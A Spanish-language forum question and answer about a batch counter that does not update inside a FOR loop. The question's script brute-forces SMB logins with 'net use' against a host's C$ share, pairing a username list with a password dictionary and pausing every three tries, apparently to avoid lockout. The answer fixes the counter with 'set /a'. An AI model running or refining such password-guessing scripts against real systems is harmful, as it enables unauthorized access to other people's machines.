# Actualizar valor dentro de un for en batch

Tags: batch, loops

Quiero actualizar un valor de una variable en un programa en `batch`, mi problema es que cuando lo hago dentro de la *función principal*, no se actualiza el valor, si paso ese valor a *otra función* se actualiza el valor pero cuando lo regreso a la principal queda con el valor declarado, en mi caso en *1*.

```
@echo off

SetLocal EnableDelayedExpansion
set /a contador=1
FOR /F %%h in (usuario.txt) do (
    FOR /F %%i in (diccionario.txt) do (

        echo Probando con usuario:%%h contrasenia:%%i
        net use \\192.168.0.76\C$ %%i /user:%%h

        set /a contador
            Rem "!" debido a la expansión de variable.
            if !ERRORLEVEL! equ 0 (
            echo [+] Password correcto! %%i
            net use
            goto :salir
            ) else (
            echo [+] fallo
            )

            echo valor de contador antes del if: %contador%
            if %contador% equ 3 (
            **set contador=1--> no se resetea el valor **
            Timeout /T 1800
            ) else (
            **set contador+=1---> no actualiza**
                )
            echo valor de contador es: %contador%
        )
)
:salir EndLocal
```

Answer (score 2):

Se te ha olvidado añadir el parametro /a en el incremento de %contador%

```
set /a contador+=1
```

Esto quiere decir que vas a realizar una operación aritmética sobre la variable.
Yo creo que es importante añadir /a cuando vas a realizar la operación en la misma asignación, cuando vas a realizar un incremento o decremento etc.
Poner /a en una variable declarada con un valor fijo por ejemplo

```
set contador=1
```

se podría omitir como ves en el resultado del codigo que te pongo más abajo.
Yendo al trozo donde tienes los comentarios del error quedaría así. Prueba a poner **contador** a 1 y a 3 por ejemplo y verás que funciona.

```
@echo off
setlocal EnableDelayedExpansion

set contador=1

echo valor de contador antes del if: %contador%

if %contador% EQU 3 (
    set contador=1
    Timeout /T 4
) else (
    set /a contador+=1
)
@echo valor de contador es: %contador%
endlocal
pause > nul
```

He puesto el timeout a 3 segundos para que no haya que esperar mucho a ver el resultado.

El resto del código no lo puedo probar porque carezco de los archivos de texto que usas.